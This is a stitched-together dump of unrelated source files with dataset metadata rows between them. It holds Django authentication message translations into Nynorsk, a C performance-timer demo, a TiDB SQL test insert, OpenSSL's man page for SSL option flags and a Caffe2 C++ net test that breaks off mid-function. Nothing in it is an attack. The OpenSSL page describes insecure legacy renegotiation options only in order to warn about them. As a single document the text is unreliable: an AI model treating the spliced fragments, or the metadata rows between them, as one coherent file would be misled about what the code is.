msgstr "brukar"
msgid "users"
msgstr "brukarar"
#, python-format
msgid ""
"This password is too short. It must contain at least %(min_length)d "
"character."
msgid_plural ""
"This password is too short. It must contain at least %(min_length)d "
"characters."
msgstr[0] ""
"Dette passordet er for stutt. Det må innehalde minst %(min_length)d teikn."
msgstr[1] ""
"Dette passordet er for stutt. Det må innehalde minst %(min_length)d teikn."
#, python-format
msgid "Your password must contain at least %(min_length)d character."
msgid_plural "Your password must contain at least %(min_length)d characters."
msgstr[0] "Passordet ditt må innehalde minst %(min_length)d teikn."
msgstr[1] "Passordet ditt må innehalde minst %(min_length)d teikn."
#, python-format
msgid "The password is too similar to the %(verbose_name)s."
msgstr "Passordet er for likt %(verbose_name)s."
msgid "Your password can’t be too similar to your other personal information."
msgstr "Passordet ditt kan ikkje vere for likt dine andre personopplysingar."
msgid "This password is too common."
msgstr "Dette passordet er for vanleg."
msgid "Your password can’t be a commonly used password."
msgstr "Passordet ditt kan ikkje vere eit ofte brukt passord."
msgid "This password is entirely numeric."
msgstr "Dette passordet innehalder berre tal."
msgid "Your password can’t be entirely numeric."
msgstr "Passordet ditt kan ikkje innehalde berre tal."
#, python-format
msgid "Password reset on %(site_name)s"
msgstr "Passordnullstilling på %(site_name)s"
msgid ""
"Enter a valid username. This value may contain only English letters, "
"numbers, and @/./+/-/_ characters."
msgstr ""
"Oppgje eit gyldig brukarnamn. Denne verdien kan berre innehalde bokstavar, "
"tal, og @/./+/-/_ teikn."
msgid ""
"Enter a valid username. This value may contain only letters, numbers, and "
"@/./+/-/_ characters."
msgstr ""
"Oppgje eit gyldig brukarnamn. Denne verdien kan berre innehalde bokstavar, "
"tal, og @/./+/-/_ teikn."
msgid "Logged out"
msgstr "Logga ut"
msgid "Password reset"
msgstr "Nullstill passord"
msgid "Password reset sent"
msgstr "Passordnullstilling utsendt"
msgid "Enter new password"
msgstr "Oppgje nytt passord"
msgid "Password reset unsuccessful"
msgstr "Passordet vart ikkje nullstilt"
msgid "Password reset complete"
msgstr "Passord nullstilt"
msgid "Password change"
msgstr "Endre passord"
msgid "Password change successful"
msgstr "Passord endra"
| Gettext Catalog | 4 | Joshua-Barawa/My-Photos | venv/lib/python3.8/site-packages/django/contrib/auth/locale/nn/LC_MESSAGES/django.po | [
"PostgreSQL",
"Unlicense"
] |
/*
* test_perf.c
*
* Created on: Jul 6, 2013
* Author: mgrosvenor
*/
#include "../perf/perf.h"
#include <stdio.h>
USE_CH_LOGGER_DEFAULT;
USE_CH_PERF(4094);
int main(int argc, char** argv)
{
(void)argc;
(void)argv;
ch_perf_sample_tsc;
printf("TSC at start = %llu\n", ch_perf_get_tsc_sample());
ch_perf_timer_reset;
ch_perf_timer_start;
ch_perf_event_start(0,0);
int i;
for(i = 0; i < 2048; i++){
if(i < 1024){
ch_perf_event_stop(0,0);
}
else{
ch_perf_event_stop(0,1);
}
ch_perf_event_start(0,0);
}
ch_perf_finish(ch_perf_output_tostdout,ch_perf_format_csv,NULL);
ch_perf_timer_stop;
printf("Timer diff=%llu\n", ch_perf_get_watch_ticks());
ch_perf_sample_tsc;
printf("tsc at end = %llu\n", ch_perf_get_tsc_sample());
return 0;
}
| XC | 3 | mgrosvenor/libchaste | tests/demo_perf.xc | [
"BSD-3-Clause"
] |
insert into non_pk (pk, _tidb_rowid) values
('eight', 8),
('five', 5),
('four', 4),
('nine', 9),
('one', 1),
('seven', 7),
('six', 6),
('ten', 10),
('three', 3),
('two', 2);
| SQL | 3 | WizardXiao/tidb | br/tests/lightning_tidb_rowid/data/rowid.explicit_tidb_rowid.sql | [
"Apache-2.0"
] |
=pod
=head1 NAME
SSL_CTX_set_options, SSL_set_options, SSL_CTX_clear_options,
SSL_clear_options, SSL_CTX_get_options, SSL_get_options,
SSL_get_secure_renegotiation_support - manipulate SSL options
=head1 SYNOPSIS
#include <openssl/ssl.h>
uint64_t SSL_CTX_set_options(SSL_CTX *ctx, uint64_t options);
uint64_t SSL_set_options(SSL *ssl, uint64_t options);
uint64_t SSL_CTX_clear_options(SSL_CTX *ctx, uint64_t options);
uint64_t SSL_clear_options(SSL *ssl, uint64_t options);
uint64_t SSL_CTX_get_options(const SSL_CTX *ctx);
uint64_t SSL_get_options(const SSL *ssl);
long SSL_get_secure_renegotiation_support(SSL *ssl);
=head1 DESCRIPTION
SSL_CTX_set_options() adds the options set via bit-mask in B<options> to B<ctx>.
Options already set before are not cleared!
SSL_set_options() adds the options set via bit-mask in B<options> to B<ssl>.
Options already set before are not cleared!
SSL_CTX_clear_options() clears the options set via bit-mask in B<options>
to B<ctx>.
SSL_clear_options() clears the options set via bit-mask in B<options> to B<ssl>.
SSL_CTX_get_options() returns the options set for B<ctx>.
SSL_get_options() returns the options set for B<ssl>.
SSL_get_secure_renegotiation_support() indicates whether the peer supports
secure renegotiation.
Note, this is implemented via a macro.
=head1 NOTES
The behaviour of the SSL library can be changed by setting several options.
The options are coded as bit-masks and can be combined by a bitwise B<or>
operation (|).
SSL_CTX_set_options() and SSL_set_options() affect the (external)
protocol behaviour of the SSL library. The (internal) behaviour of
the API can be changed by using the similar
L<SSL_CTX_set_mode(3)> and SSL_set_mode() functions.
During a handshake, the option settings of the SSL object are used. When
a new SSL object is created from a context using SSL_new(), the current
option setting is copied. Changes to B<ctx> do not affect already created
SSL objects. SSL_clear() does not affect the settings.
The following B<bug workaround> options are available:
=over 4
=item SSL_OP_CRYPTOPRO_TLSEXT_BUG
Add server-hello extension from the early version of cryptopro draft
when GOST ciphersuite is negotiated. Required for interoperability with CryptoPro
CSP 3.x.
=item SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS
Disables a countermeasure against a SSL 3.0/TLS 1.0 protocol
vulnerability affecting CBC ciphers, which cannot be handled by some
broken SSL implementations. This option has no effect for connections
using other ciphers.
=item SSL_OP_SAFARI_ECDHE_ECDSA_BUG
Don't prefer ECDHE-ECDSA ciphers when the client appears to be Safari on OS X.
OS X 10.8..10.8.3 has broken support for ECDHE-ECDSA ciphers.
=item SSL_OP_TLSEXT_PADDING
Adds a padding extension to ensure the ClientHello size is never between
256 and 511 bytes in length. This is needed as a workaround for some
implementations.
=item SSL_OP_ALL
All of the above bug workarounds.
=back
It is usually safe to use B<SSL_OP_ALL> to enable the bug workaround
options if compatibility with somewhat broken implementations is
desired.
The following B<modifying> options are available:
=over 4
=item SSL_OP_ALLOW_CLIENT_RENEGOTIATION
Client-initiated renegotiation is disabled by default. Use
this option to enable it.
=item SSL_OP_ALLOW_NO_DHE_KEX
In TLSv1.3 allow a non-(ec)dhe based key exchange mode on resumption. This means
that there will be no forward secrecy for the resumed session.
=item SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION
Allow legacy insecure renegotiation between OpenSSL and unpatched clients or
servers. See the B<SECURE RENEGOTIATION> section for more details.
=item SSL_OP_CIPHER_SERVER_PREFERENCE
When choosing a cipher, use the server's preferences instead of the client
preferences. When not set, the SSL server will always follow the clients
preferences. When set, the SSL/TLS server will choose following its
own preferences.
=item SSL_OP_CISCO_ANYCONNECT
Use Cisco's version identifier of DTLS_BAD_VER when establishing a DTLSv1
connection. Only available when using the deprecated DTLSv1_client_method() API.
=item SSL_OP_CLEANSE_PLAINTEXT
By default TLS connections keep a copy of received plaintext
application data in a static buffer until it is overwritten by the
next portion of data. When enabling SSL_OP_CLEANSE_PLAINTEXT
deciphered application data is cleansed by calling OPENSSL_cleanse(3)
after passing data to the application. Data is also cleansed when
releasing the connection (e.g. L<SSL_free(3)>).
Since OpenSSL only cleanses internal buffers, the application is still
responsible for cleansing all other buffers. Most notably, this
applies to buffers passed to functions like L<SSL_read(3)>,
L<SSL_peek(3)> but also like L<SSL_write(3)>.
=item SSL_OP_COOKIE_EXCHANGE
Turn on Cookie Exchange as described in RFC4347 Section 4.2.1. Only affects
DTLS connections.
=item SSL_OP_DISABLE_TLSEXT_CA_NAMES
Disable TLS Extension CA Names. You may want to disable it for security reasons
or for compatibility with some Windows TLS implementations crashing when this
extension is larger than 1024 bytes.
=item SSL_OP_ENABLE_KTLS
Enable the use of kernel TLS. In order to benefit from kernel TLS OpenSSL must
have been compiled with support for it, and it must be supported by the
negotiated ciphersuites and extensions. The specific ciphersuites and extensions
that are supported may vary by platform and kernel version.
The kernel TLS data-path implements the record layer, and the encryption
algorithm. The kernel will utilize the best hardware
available for encryption. Using the kernel data-path should reduce the memory
footprint of OpenSSL because no buffering is required. Also, the throughput
should improve because data copy is avoided when user data is encrypted into
kernel memory instead of the usual encrypt then copy to kernel.
Kernel TLS might not support all the features of OpenSSL. For instance,
renegotiation, and setting the maximum fragment size is not possible as of
Linux 4.20.
Note that with kernel TLS enabled some cryptographic operations are performed
by the kernel directly and not via any available OpenSSL Providers. This might
be undesirable if, for example, the application requires all cryptographic
operations to be performed by the FIPS provider.
=item SSL_OP_ENABLE_MIDDLEBOX_COMPAT
If set then dummy Change Cipher Spec (CCS) messages are sent in TLSv1.3. This
has the effect of making TLSv1.3 look more like TLSv1.2 so that middleboxes that
do not understand TLSv1.3 will not drop the connection. Regardless of whether
this option is set or not CCS messages received from the peer will always be
ignored in TLSv1.3. This option is set by default. To switch it off use
SSL_clear_options(). A future version of OpenSSL may not set this by default.
=item SSL_OP_IGNORE_UNEXPECTED_EOF
Some TLS implementations do not send the mandatory close_notify alert on
shutdown. If the application tries to wait for the close_notify alert but the
peer closes the connection without sending it, an error is generated. When this
option is enabled the peer does not need to send the close_notify alert and a
closed connection will be treated as if the close_notify alert was received.
You should only enable this option if the protocol running over TLS
can detect a truncation attack itself, and that the application is checking for
that truncation attack.
For more information on shutting down a connection, see L<SSL_shutdown(3)>.
=item SSL_OP_LEGACY_SERVER_CONNECT
Allow legacy insecure renegotiation between OpenSSL and unpatched servers
B<only>. See the B<SECURE RENEGOTIATION> section for more details.
=item SSL_OP_NO_ANTI_REPLAY
By default, when a server is configured for early data (i.e., max_early_data > 0),
OpenSSL will switch on replay protection. See L<SSL_read_early_data(3)> for a
description of the replay protection feature. Anti-replay measures are required
to comply with the TLSv1.3 specification. Some applications may be able to
mitigate the replay risks in other ways and in such cases the built in OpenSSL
functionality is not required. Those applications can turn this feature off by
setting this option. This is a server-side opton only. It is ignored by
clients.
=item SSL_OP_NO_COMPRESSION
Do not use compression even if it is supported. This option is set by default.
To switch it off use SSL_clear_options().
=item SSL_OP_NO_ENCRYPT_THEN_MAC
Normally clients and servers will transparently attempt to negotiate the
RFC7366 Encrypt-then-MAC option on TLS and DTLS connection.
If this option is set, Encrypt-then-MAC is disabled. Clients will not
propose, and servers will not accept the extension.
=item SSL_OP_NO_EXTENDED_MASTER_SECRET
Normally clients and servers will transparently attempt to negotiate the
RFC7627 Extended Master Secret option on TLS and DTLS connection.
If this option is set, Extended Master Secret is disabled. Clients will
not propose, and servers will not accept the extension.
=item SSL_OP_NO_QUERY_MTU
Do not query the MTU. Only affects DTLS connections.
=item SSL_OP_NO_RENEGOTIATION
Disable all renegotiation in TLSv1.2 and earlier. Do not send HelloRequest
messages, and ignore renegotiation requests via ClientHello.
=item SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
When performing renegotiation as a server, always start a new session
(i.e., session resumption requests are only accepted in the initial
handshake). This option is not needed for clients.
=item SSL_OP_NO_SSLv3, SSL_OP_NO_TLSv1, SSL_OP_NO_TLSv1_1,
SSL_OP_NO_TLSv1_2, SSL_OP_NO_TLSv1_3, SSL_OP_NO_DTLSv1, SSL_OP_NO_DTLSv1_2
These options turn off the SSLv3, TLSv1, TLSv1.1, TLSv1.2 or TLSv1.3 protocol
versions with TLS or the DTLSv1, DTLSv1.2 versions with DTLS,
respectively.
As of OpenSSL 1.1.0, these options are deprecated, use
L<SSL_CTX_set_min_proto_version(3)> and
L<SSL_CTX_set_max_proto_version(3)> instead.
=item SSL_OP_NO_TICKET
SSL/TLS supports two mechanisms for resuming sessions: session ids and stateless
session tickets.
When using session ids a copy of the session information is
cached on the server and a unique id is sent to the client. When the client
wishes to resume it provides the unique id so that the server can retrieve the
session information from its cache.
When using stateless session tickets the server uses a session ticket encryption
key to encrypt the session information. This encrypted data is sent to the
client as a "ticket". When the client wishes to resume it sends the encrypted
data back to the server. The server uses its key to decrypt the data and resume
the session. In this way the server can operate statelessly - no session
information needs to be cached locally.
The TLSv1.3 protocol only supports tickets and does not directly support session
ids. However, OpenSSL allows two modes of ticket operation in TLSv1.3: stateful
and stateless. Stateless tickets work the same way as in TLSv1.2 and below.
Stateful tickets mimic the session id behaviour available in TLSv1.2 and below.
The session information is cached on the server and the session id is wrapped up
in a ticket and sent back to the client. When the client wishes to resume, it
presents a ticket in the same way as for stateless tickets. The server can then
extract the session id from the ticket and retrieve the session information from
its cache.
By default OpenSSL will use stateless tickets. The SSL_OP_NO_TICKET option will
cause stateless tickets to not be issued. In TLSv1.2 and below this means no
ticket gets sent to the client at all. In TLSv1.3 a stateful ticket will be
sent. This is a server-side option only.
In TLSv1.3 it is possible to suppress all tickets (stateful and stateless) from
being sent by calling L<SSL_CTX_set_num_tickets(3)> or
L<SSL_set_num_tickets(3)>.
=item SSL_OP_PRIORITIZE_CHACHA
When SSL_OP_CIPHER_SERVER_PREFERENCE is set, temporarily reprioritize
ChaCha20-Poly1305 ciphers to the top of the server cipher list if a
ChaCha20-Poly1305 cipher is at the top of the client cipher list. This helps
those clients (e.g. mobile) use ChaCha20-Poly1305 if that cipher is anywhere
in the server cipher list; but still allows other clients to use AES and other
ciphers. Requires B<SSL_OP_CIPHER_SERVER_PREFERENCE>.
=item SSL_OP_TLS_ROLLBACK_BUG
Disable version rollback attack detection.
During the client key exchange, the client must send the same information
about acceptable SSL/TLS protocol levels as during the first hello. Some
clients violate this rule by adapting to the server's answer. (Example:
the client sends a SSLv2 hello and accepts up to SSLv3.1=TLSv1, the server
only understands up to SSLv3. In this case the client must still use the
same SSLv3.1=TLSv1 announcement. Some clients step down to SSLv3 with respect
to the server's answer and violate the version rollback protection.)
=back
The following options no longer have any effect but their identifiers are
retained for compatibility purposes:
=over 4
=item SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG
=item SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER
=item SSL_OP_SSLEAY_080_CLIENT_DH_BUG
=item SSL_OP_TLS_D5_BUG
=item SSL_OP_TLS_BLOCK_PADDING_BUG
=item SSL_OP_MSIE_SSLV2_RSA_PADDING
=item SSL_OP_SSLREF2_REUSE_CERT_TYPE_BUG
=item SSL_OP_MICROSOFT_SESS_ID_BUG
=item SSL_OP_NETSCAPE_CHALLENGE_BUG
=item SSL_OP_PKCS1_CHECK_1
=item SSL_OP_PKCS1_CHECK_2
=item SSL_OP_SINGLE_DH_USE
=item SSL_OP_SINGLE_ECDH_USE
=item SSL_OP_EPHEMERAL_RSA
=back
=head1 SECURE RENEGOTIATION
OpenSSL always attempts to use secure renegotiation as
described in RFC5746. This counters the prefix attack described in
CVE-2009-3555 and elsewhere.
This attack has far reaching consequences which application writers should be
aware of. In the description below an implementation supporting secure
renegotiation is referred to as I<patched>. A server not supporting secure
renegotiation is referred to as I<unpatched>.
The following sections describe the operations permitted by OpenSSL's secure
renegotiation implementation.
=head2 Patched client and server
Connections and renegotiation are always permitted by OpenSSL implementations.
=head2 Unpatched client and patched OpenSSL server
The initial connection succeeds but client renegotiation is denied by the
server with a B<no_renegotiation> warning alert if TLS v1.0 is used or a fatal
B<handshake_failure> alert in SSL v3.0.
If the patched OpenSSL server attempts to renegotiate a fatal
B<handshake_failure> alert is sent. This is because the server code may be
unaware of the unpatched nature of the client.
If the option B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> is set then
renegotiation B<always> succeeds.
=head2 Patched OpenSSL client and unpatched server
If the option B<SSL_OP_LEGACY_SERVER_CONNECT> or
B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> is set then initial connections
and renegotiation between patched OpenSSL clients and unpatched servers
succeeds. If neither option is set then initial connections to unpatched
servers will fail.
Setting the option B<SSL_OP_LEGACY_SERVER_CONNECT> has security implications;
clients that are willing to connect to servers that do not implement
RFC 5746 secure renegotiation are subject to attacks such as
CVE-2009-3555.
OpenSSL client applications wishing to ensure they can connect to unpatched
servers should always B<set> B<SSL_OP_LEGACY_SERVER_CONNECT>
OpenSSL client applications that want to ensure they can B<not> connect to
unpatched servers (and thus avoid any security issues) should always B<clear>
B<SSL_OP_LEGACY_SERVER_CONNECT> using SSL_CTX_clear_options() or
SSL_clear_options().
The difference between the B<SSL_OP_LEGACY_SERVER_CONNECT> and
B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> options is that
B<SSL_OP_LEGACY_SERVER_CONNECT> enables initial connections and secure
renegotiation between OpenSSL clients and unpatched servers B<only>, while
B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION> allows initial connections
and renegotiation between OpenSSL and unpatched clients or servers.
=head1 RETURN VALUES
SSL_CTX_set_options() and SSL_set_options() return the new options bit-mask
after adding B<options>.
SSL_CTX_clear_options() and SSL_clear_options() return the new options bit-mask
after clearing B<options>.
SSL_CTX_get_options() and SSL_get_options() return the current bit-mask.
SSL_get_secure_renegotiation_support() returns 1 is the peer supports
secure renegotiation and 0 if it does not.
=head1 SEE ALSO
L<ssl(7)>, L<SSL_new(3)>, L<SSL_clear(3)>, L<SSL_shutdown(3)>
L<SSL_CTX_set_tmp_dh_callback(3)>,
L<SSL_CTX_set_min_proto_version(3)>,
L<openssl-dhparam(1)>
=head1 HISTORY
The attempt to always try to use secure renegotiation was added in
OpenSSL 0.9.8m.
The B<SSL_OP_PRIORITIZE_CHACHA> and B<SSL_OP_NO_RENEGOTIATION> options
were added in OpenSSL 1.1.1.
The B<SSL_OP_NO_EXTENDED_MASTER_SECRET> and B<SSL_OP_IGNORE_UNEXPECTED_EOF>
options were added in OpenSSL 3.0.
The B<SSL_OP_> constants and the corresponding parameter and return values
of the affected functions were changed to C<uint64_t> type in OpenSSL 3.0.
For that reason it is no longer possible use the B<SSL_OP_> macro values
in preprocessor C<#if> conditions. However it is still possible to test
whether these macros are defined or not.
=head1 COPYRIGHT
Copyright 2001-2021 The OpenSSL Project Authors. All Rights Reserved.
Licensed under the Apache License 2.0 (the "License"). You may not use
this file except in compliance with the License. You can obtain a copy
in the file LICENSE in the source distribution or at
L<https://www.openssl.org/source/license.html>.
=cut
| Pod | 5 | pmesnier/openssl | doc/man3/SSL_CTX_set_options.pod | [
"Apache-2.0"
] |
#include <gtest/gtest.h>
#include "c10/util/StringUtil.h"
#include "caffe2/core/net.h"
#include "caffe2/core/net_async_scheduling.h"
#include "caffe2/core/operator.h"
#include "caffe2/core/scope_guard.h"
#include <google/protobuf/text_format.h>
namespace caffe2 {
namespace {
static std::atomic<int> counter;
// A net test dummy op that does nothing but scaffolding. Here, we
// inherit from OperatorBase because we instantiate on both CPU and
// GPU. In general, you want to only inherit from Operator<Context>.
class NetTestDummyOp final : public OperatorBase {
public:
using OperatorBase::OperatorBase;
NetTestDummyOp(const OperatorDef& operator_def, Workspace* ws)
: OperatorBase(operator_def, ws),
fail_(OperatorBase::GetSingleArgument<bool>("fail", false)) {}
bool Run(int /* unused */ /*stream_id*/) override {
if (fail_) {
return false;
}
counter.fetch_add(1);
return true;
}
// Simulate CUDA operator behavior
bool HasAsyncPart() const override {
return debug_def().device_option().device_type() == PROTO_CUDA;
}
bool SupportsAsyncScheduling() const override {
return debug_def().device_option().device_type() == PROTO_CUDA;
}
protected:
// NOLINTNEXTLINE(cppcoreguidelines-non-private-member-variables-in-classes)
const bool fail_;
};
REGISTER_CPU_OPERATOR(NetTestDummy, NetTestDummyOp);
REGISTER_CUDA_OPERATOR(NetTestDummy, NetTestDummyOp);
REGISTER_CPU_OPERATOR(NetTestDummy2, NetTestDummyOp);
REGISTER_CUDA_OPERATOR(NetTestDummy2, NetTestDummyOp);
OPERATOR_SCHEMA(NetTestDummy)
.NumInputs(0, INT_MAX)
.NumOutputs(0, INT_MAX)
.AllowInplace({{0, 0}, {1, 1}});
OPERATOR_SCHEMA(NetTestDummy2)
.NumInputs(0, INT_MAX)
.NumOutputs(0, INT_MAX)
.AllowInplace({{1, 0}});
unique_ptr<NetBase> CreateNetTestHelper(
Workspace* ws,
const vector<string>& input,
const vector<string>& output) {
NetDef net_def;
{
auto& op = *(net_def.add_op());
op.set_type("NetTestDummy");
op.add_input("in");
op.add_output("hidden");
}
{
auto& op = *(net_def.add_op());
op.set_type("NetTestDummy");
op.add_input("hidden");
op.add_output("out");
}
for (const auto& name : input) {
net_def.add_external_input(name);
}
for (const auto& name : output) {
net_def.add_external_output(name);
}
return CreateNet(net_def, ws);
}
} // namespace
TEST(NetTest, ConstructionNoDeclaredInputOutput) {
Workspace ws;
ws.CreateBlob("in");
unique_ptr<NetBase> net(
CreateNetTestHelper(&ws, vector<string>(), vector<string>()));
EXPECT_TRUE(net.get() != nullptr);
}
TEST(NetTest, ConstructionDeclaredInput) {
Workspace ws;
ws.CreateBlob("in");
unique_ptr<NetBase> net(
CreateNetTestHelper(&ws, vector<string>{"in"}, vector<string>()));
EXPECT_TRUE(net.get() != nullptr);
}
TEST(NetTest, ConstructionDeclaredOutput) {
Workspace ws;
ws.CreateBlob("in");
unique_ptr<NetBase> net(
CreateNetTestHelper(&ws, vector<string>(), vector<string>{"out"}));
EXPECT_TRUE(net.get() != nullptr);
}
TEST(NetTest, DeclaredInputInsufficient) {
Workspace ws;
ws.CreateBlob("in");
// NOLINTNEXTLINE(cppcoreguidelines-avoid-goto,hicpp-avoid-goto)
ASSERT_THROW(
CreateNetTestHelper(&ws, vector<string>{"unuseful_in"}, vector<string>()),
EnforceNotMet);
}
TEST(NetDeathTest, DeclaredOutputNotMet) {
Workspace ws;
ws.CreateBlob("in");
// NOLINTNEXTLINE(cppcoreguidelines-avoid-goto,hicpp-avoid-goto)
ASSERT_THROW(
CreateNetTestHelper(
&ws, vector<string>(), vector<string>{"unproduced_out"}),
EnforceNotMet);
}
void testExecution(std::unique_ptr<NetBase>& net, int num_ops) {
// Run 100 times
for (int i = 0; i < 100; i++) {
counter.exchange(0);
net.get()->Run();
ASSERT_EQ(num_ops, counter.load());
}
}
void checkChainingAndRun(
const char* spec,
const dag_utils::ExecutionChains& expected) {
Workspace ws;
ws.CreateBlob("in");
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
{
net_def.set_num_workers(4);
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
auto* dag = dynamic_cast_if_rtti<AsyncNetBase*>(net.get());
CHECK_NOTNULL(dag);
const auto& chains = dag->TEST_execution_chains();
EXPECT_TRUE(chains == expected);
testExecution(net, net_def.op().size());
}
}
void checkNumChainsAndRun(const char* spec, const int expected_num_chains) {
Workspace ws;
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
net_def.set_num_workers(4);
// Create all external inputs
// NOLINTNEXTLINE(performance-for-range-copy)
for (auto inp : net_def.external_input()) {
ws.CreateBlob(inp);
}
{
std::unique_ptr<NetBase> net(CreateNet(net_def, &ws));
auto* dag = dynamic_cast_if_rtti<AsyncNetBase*>(net.get());
CHECK_NOTNULL(dag);
const auto& chains = dag->TEST_execution_chains();
EXPECT_EQ(expected_num_chains, chains.size());
testExecution(net, net_def.op().size());
}
}
TEST(NetTest, DISABLED_ChainingForLinearModel) {
const auto spec = R"DOC(
name: "example"
type: "dag"
external_input: "in"
op {
input: "in"
output: "hidden"
type: "NetTestDummy"
}
op {
input: "hidden"
output: "out"
type: "NetTestDummy"
}
)DOC";
checkChainingAndRun(spec, {{0, {0, 1}}});
}
TEST(NetTest, DISABLED_ChainingForFork) {
const auto spec = R"DOC(
name: "example"
type: "dag"
external_input: "in"
op {
input: "in"
output: "hidden"
type: "NetTestDummy"
}
op {
input: "hidden"
output: "out1"
type: "NetTestDummy"
}
op {
input: "hidden"
output: "out2"
type: "NetTestDummy"
}
)DOC";
checkChainingAndRun(spec, {{0, {0}}, {1, {1}}, {2, {2}}});
}
// TEST(NetTest, ChainingForJoinWithAncestor) {
// const auto spec = R"DOC(
// name: "example"
// type: "dag"
// external_input: "in"
// op {
// input: "in"
// output: "hidden"
// type: "NetTestDummy"
// }
// op {
// input: "hidden"
// output: "out1"
// type: "NetTestDummy"
// }
// op {
// input: "hidden"
// output: "out2"
// type: "NetTestDummy"
// }
// op {
// input: "hidden"
// input: "out2"
// type: "NetTestDummy"
// }
// )DOC";
// checkChainingAndRun(spec, {{0, {0}}, {1, {1}}, {2, {2, 3}}});
// }
TEST(NetTest, DISABLED_ChainingForForkJoin) {
const auto spec = R"DOC(
name: "example"
type: "dag"
external_input: "in"
op {
input: "in"
output: "hidden1"
type: "NetTestDummy"
}
op {
input: "in"
output: "hidden2"
type: "NetTestDummy"
}
op {
input: "hidden1"
input: "hidden2"
output: "out"
type: "NetTestDummy"
}
op {
input: "out"
output: "out2"
type: "NetTestDummy"
}
)DOC";
checkChainingAndRun(spec, {{0, {0}}, {1, {1}}, {2, {2, 3}}});
}
TEST(NetTest, DISABLED_ChainingForwardBackward) {
const auto spec = R"DOC(
name: "gpu_0"
type: "dag"
op {
input: "in"
input: "fc_0_w"
input: "fc_0_b"
output: "fc_0"
name: "0"
type: "NetTestDummy"
}
op {
input: "fc_0"
output: "fc_0"
name: "1"
type: "NetTestDummy"
}
op {
input: "fc_0"
input: "fc_1_w"
input: "fc_1_b"
output: "fc_1"
name: "2"
type: "NetTestDummy"
}
op {
input: "fc_1"
output: "fc_1"
name: "3"
type: "NetTestDummy"
}
op {
input: "fc_1"
input: "fc_2_w"
input: "fc_2_b"
output: "fc_2"
name: "4"
type: "NetTestDummy"
}
op {
input: "fc_2"
output: "fc_2"
name: "5"
type: "NetTestDummy"
}
op {
input: "fc_2"
input: "fc_3_w"
input: "fc_3_b"
output: "fc_3"
name: "6"
type: "NetTestDummy"
}
op {
input: "fc_3"
output: "fc_3"
name: "7"
type: "NetTestDummy"
}
op {
input: "fc_3"
input: "fc_4_w"
input: "fc_4_b"
output: "fc_4"
name: "8"
type: "NetTestDummy"
}
op {
input: "fc_4"
output: "fc_4"
name: "9"
type: "NetTestDummy"
}
op {
input: "fc_4"
input: "in2"
output: "LabelCrossEntropy"
name: "10"
type: "NetTestDummy"
}
op {
input: "LabelCrossEntropy"
output: "AveragedLoss"
name: "11"
type: "NetTestDummy"
}
op {
input: "AveragedLoss"
output: "AveragedLoss_autogen_grad"
name: "12"
type: "NetTestDummy"
}
op {
input: "LabelCrossEntropy"
input: "AveragedLoss_autogen_grad"
output: "LabelCrossEntropy_grad"
name: "13"
type: "NetTestDummy"
}
op {
input: "fc_4"
input: "label"
input: "LabelCrossEntropy_grad"
output: "fc_4_grad"
name: "14"
type: "NetTestDummy2"
}
op {
input: "fc_4"
input: "fc_4_grad"
output: "fc_4_grad"
name: "15"
type: "NetTestDummy2"
}
op {
input: "fc_3"
input: "fc_4_w"
input: "fc_4_grad"
output: "fc_4_w_grad"
output: "fc_4_b_grad"
output: "fc_3_grad"
name: "16"
type: "NetTestDummy"
}
op {
input: "fc_3"
input: "fc_3_grad"
output: "fc_3_grad"
name: "17"
type: "NetTestDummy2"
}
op {
input: "fc_2"
input: "fc_3_w"
input: "fc_3_grad"
output: "fc_3_w_grad"
output: "fc_3_b_grad"
output: "fc_2_grad"
name: "18"
type: "NetTestDummy"
}
op {
input: "fc_2"
input: "fc_2_grad"
output: "fc_2_grad"
name: "19"
type: "NetTestDummy2"
}
op {
input: "fc_1"
input: "fc_2_w"
input: "fc_2_grad"
output: "fc_2_w_grad"
output: "fc_2_b_grad"
output: "fc_1_grad"
name: "20"
type: "NetTestDummy"
}
op {
input: "fc_1"
input: "fc_1_grad"
output: "fc_1_grad"
name: "21"
type: "NetTestDummy2"
}
op {
input: "fc_0"
input: "fc_1_w"
input: "fc_1_grad"
output: "fc_1_w_grad"
output: "fc_1_b_grad"
output: "fc_0_grad"
name: "22"
type: "NetTestDummy"
}
op {
input: "fc_0"
input: "fc_0_grad"
output: "fc_0_grad"
name: "23"
type: "NetTestDummy2"
}
op {
input: "in"
input: "fc_0_w"
input: "fc_0_grad"
output: "fc_0_w_grad"
output: "fc_0_b_grad"
output: "data_grad"
name: "24"
type: "NetTestDummy"
}
external_input: "in"
external_input: "in2"
external_input: "LR"
external_input: "fc_0_w"
external_input: "fc_0_b"
external_input: "fc_1_w"
external_input: "fc_1_b"
external_input: "fc_2_w"
external_input: "fc_2_b"
external_input: "fc_3_w"
external_input: "fc_3_b"
external_input: "fc_4_w"
external_input: "fc_4_b"
external_input: "label"
)DOC";
checkNumChainsAndRun(spec, 1);
}
TEST(NetTest, DISABLED_ChainingForHogwildModel) {
const auto spec = R"DOC(
name: "example"
type: "dag"
external_input: "in"
op {
input: "in"
output: "hidden1"
type: "NetTestDummy"
}
op {
input: "hidden1"
output: "mid1"
type: "NetTestDummy"
}
op {
input: "mid1"
output: "out1"
type: "NetTestDummy"
}
op {
input: "in"
output: "hidden2"
type: "NetTestDummy"
}
op {
input: "hidden2"
output: "mid2"
type: "NetTestDummy"
}
op {
input: "mid2"
output: "out2"
type: "NetTestDummy"
}
)DOC";
checkNumChainsAndRun(spec, 2);
}
TEST(NetTest, DISABLED_FailingOperator) {
const auto spec = R"DOC(
name: "example"
type: "dag"
external_input: "in"
op {
input: "in"
output: "hidden"
type: "NetTestDummy"
}
op {
input: "hidden"
output: "out"
type: "NetTestDummy"
arg {
name: "fail"
i: 1
}
}
)DOC";
Workspace ws;
ws.CreateBlob("in");
NetDef net_def;
CAFFE_ENFORCE(TextFormat::ParseFromString(spec, &net_def));
{
net_def.set_num_workers(4);
